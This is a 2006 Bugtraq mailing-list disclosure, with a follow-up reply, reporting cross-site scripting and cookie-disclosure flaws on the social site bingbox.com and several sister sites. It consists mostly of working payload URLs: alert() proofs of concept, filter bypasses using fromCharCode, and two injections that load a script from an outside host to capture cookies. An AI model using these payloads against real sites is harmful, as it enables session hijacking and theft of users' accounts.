Hi Yes, there must be the XSS heaven :)I contacted the INCROWD Interactive Media first time in March this year and they always said, that they will patch it. Unfortunately they didn't do anything until now and I didn't believe that they will do before someone do a real nasty hack (using for DDoS for example).
There will be some similar products to bingbox.com which have all the same vulnerabilities:
redbox.de coolbox.be coolbox.fr coolbox.hu obox.nl xobox.de xobox.at xobox.ch bingbox.co.uk gentebox.esSo, we only can hope, that they will now patch it, else it seems to be their end.
Greetings, Disenchant----- Original Message ----- From: <luny@xxxxxxxxxxxxxxx>
To: <bugtraq@xxxxxxxxxxxxxxxxx> Sent: Friday, June 16, 2006 8:37 AM Subject: Bingbox.com - XSS & cookie disclosure Bingbox.com Homepage: http://www.bingbox.com Affected files: * Profile input boxes: - City input * Registering * Viewing Birthdays * Adding a friend * Viewing people online ----------------------------------------------- XSS with cookie disclosure via inviting friends: http://www.bingbox.com/go/admin/f=friends&o=invite&a=msn&t=web&wizard=start";>">">">">'>'>'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"< "<"<'<'<' XSS vuln with cookie disclosure via "City" input box on profile:Data isnt properly sanatized before being generated. In one part of the site its output as full code on the screen (tested using <img> tags, with <table> tags, no
code displays), and on the other part, an XSS can occur:For a PoC, since they add backslashes to ' and ", use the long UTF-8 Unicode for ':
<TABLE BACKGROUND=javascript:alert('XSS')> For the cookie: <TABLE BACKGROUND=javascript:alert(document.cookie)> --------------------------------------------------XSS with cookie disclosure when viewing a blog, that redirects you to the register page:
http://bingbox.com/go/register/wanted=luny666/";>">">">">">'>'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<'<'<"<" ----------------------------------------------- XSS via viewing birthdays: http://www.bingbox.com/go/birthdays/month=8&day=13";>'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<"">< "<" -------------------------------------------------XSS when adding a new friend. Same as above, we arent able to use ' or long UTF-8 unicode above, so we use fromCharCode's. PoC:
http://www.bingbox.com/go/admin/f=friends&o=new&friendname=DreamUnik";>'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))
<"<"<"<"<'<'<'<"<""><"<"
-------------------------------------------------- XSS vuln when viewing people online: http://www.bingbox.com/go/whoisonline/i=1&agemin=&agemax=&country=US";>'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))
<"<"<"<"<'<'<'<"<""><"<"&locationarea=&sex=&page=3
------------------------------------------------ More XSS vulns: http://www.bingbox.com/go/static/file=av";>'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<"">< http://www.bingbox.com/go/static/file=ps";>'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<"">< http://www.bingbox.com/go/static/file=gedragscode";>'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<"">< Screenshots: http://www.youfucktard.com/xsp/bingbox1.jpg http://www.youfucktard.com/xsp/bingbox2.jpg http://www.youfucktard.com/xsp/bingbox3.jpg http://www.youfucktard.com/xsp/bingbox4.jpg http://www.youfucktard.com/xsp/bingbox5.jpg http://www.youfucktard.com/xsp/bingbox6.jpg http://www.youfucktard.com/xsp/bingbox7.jpg http://www.youfucktard.com/xsp/bingbox8.jpg __________ NOD32 1.1454 (20060321) Information __________ This message was checked by NOD32 antivirus system. http://www.eset.com
Attachment:
smime.p7s
Description: S/MIME cryptographic signature